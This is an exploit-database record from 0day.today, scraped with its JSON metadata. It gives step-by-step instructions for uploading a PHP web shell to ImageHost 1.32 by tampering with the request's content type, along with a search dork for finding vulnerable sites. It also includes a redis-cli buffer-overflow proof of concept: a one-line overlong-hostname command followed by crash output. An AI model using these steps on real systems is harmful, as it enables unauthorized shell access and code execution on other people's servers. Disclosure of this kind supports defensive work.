ID 1337DAY-ID-12326 Type zdt Reporter RiskY Modified 2010-05-21T00:00:00
Description
Exploit for php platform in category web applications
=========================================
ImageHost 1.32 Shell Upload Vulnerability
=========================================
# Exploit Title: [ImageHost 1.32 Shell Upload ]
# Category: [ php script upload ]
# Date: [2010-05-20]
# Author: [R i sk Y]
# Contact: [email protected] , [email protected] (hotmail)
# Software Link: [not available]
# Version: [1.32]
# Tested on: [Windows XP SP 3 ]
# Dork: " ImageHost 1.32 (c) 2006 by Gentoo Tpax"
# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the
application/octet-stream to >> image/gif ... and click submit , and ur shell will b e uploaded sucessfully.
and the script will give u the direct link to ur php file.
GreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com
# 0day.today [2018-02-17] #
{"published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12326", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T03:43:41", "bulletin": {"published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12326", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-19T03:43:41"}}, "hash": "3741ec436852f0c9d677d15bf540f157fd4da3ee531732138f0061b768632ff8", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T03:43:41", "edition": 1, "title": "ImageHost 1.32 Shell Upload Vulnerability", "href": "http://0day.today/exploit/description/12326", "modified": "2010-05-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/12326", "references": [], "reporter": "RiskY", "sourceData": "=========================================\r\nImageHost 1.32 Shell Upload Vulnerability\r\n=========================================\r\n\r\n\r\n# Exploit Title: [ImageHost 1.32 Shell Upload ]\r\n\r\n# Category: [ php script upload ]\r\n\r\n# Date: [2010-05-20]\r\n\r\n# Author: [R i sk Y]\r\n\r\n# Contact: Risky.Hack@yahOO.com , rsk@null.net (hotmail)\r\n\r\n# Software Link: [not available]\r\n\r\n# Version: [1.32]\r\n\r\n# Tested on: [Windows XP SP 3 ]\r\n\r\n# Dork: \" ImageHost 1.32 (c) 2006 by Gentoo Tpax\"\r\n\r\n# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the\r\napplication/octet-stream to >> image/gif ... and click submit , and ur shell will b e uploaded sucessfully.\r\nand the script will give u the direct link to ur php file.\r\n\r\n \r\n\r\nGreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com \r\n\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0c5e16e327ebbf753eb1c8722e955c5", "key": "reporter"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "modified"}, {"hash": "8ebb2551672b288c4630fffaefe06aaa", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "daacce0a0e72db98280b4b986e01093b", "key": "sourceData"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "7050d548438c25db0fd4ff0591e39928", "key": "href"}, {"hash": "26e0a15a2c830557be4dbbfbb29e2339", "key": "sourceHref"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "e76d1f04044614888edfbd37e02ae5482227d91d779388318ce0d0fa9de4e906", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-02-18T01:30:45", "edition": 2, "title": "ImageHost 1.32 Shell Upload Vulnerability", "href": "https://0day.today/exploit/description/12326", "modified": "2010-05-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/12326", "references": [], "reporter": "RiskY", "sourceData": "=========================================\r\nImageHost 1.32 Shell Upload Vulnerability\r\n=========================================\r\n\r\n\r\n# Exploit Title: [ImageHost 1.32 Shell Upload ]\r\n\r\n# Category: [ php script upload ]\r\n\r\n# Date: [2010-05-20]\r\n\r\n# Author: [R i sk Y]\r\n\r\n# Contact: [email\u00a0protected] , [email\u00a0protected] (hotmail)\r\n\r\n# Software Link: [not available]\r\n\r\n# Version: [1.32]\r\n\r\n# Tested on: [Windows XP SP 3 ]\r\n\r\n# Dork: \" ImageHost 1.32 (c) 2006 by Gentoo Tpax\"\r\n\r\n# Info: The exploiter Uploads a Php shell using the Data Temper Addon ( In FireFox ) to change the\r\napplication/octet-stream to >> image/gif ... and click submit , and ur shell will b e uploaded sucessfully.\r\nand the script will give u the direct link to ur php file.\r\n\r\n \r\n\r\nGreetZ: indoushka - The S3r!0uS - Skull Hacker - S3curity-art.com - www.exploit-db.com \r\n\r\n\r\n\n\n# 0day.today [2018-02-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b03a6276691182d3b43871602a899729", "key": "href"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "modified"}, {"hash": "4046ff2b0de9cd14bf2fe0a449410a04", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b0c5e16e327ebbf753eb1c8722e955c5", "key": "reporter"}, {"hash": "9d8b01653fc183fed6d3eda650c8958a", "key": "sourceData"}, {"hash": "7a84200b1f5b49fda14a7a5c9201d977", "key": "sourceHref"}, {"hash": "8ebb2551672b288c4630fffaefe06aaa", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-06-19T11:38:10", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 1, "reporter": "Fakhri Zulkifli", "published": "2018-06-19T00:00:00", "title": "Redis-cli < 5.0 - Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-06-19T11:38:10", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-12326"], "modified": "2018-06-19T00:00:00", "id": "1337DAY-ID-30598", "href": "https://0day.today/exploit/description/30598", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n \r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n \r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n \r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)\n\n# 0day.today [2018-06-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30598"}]}
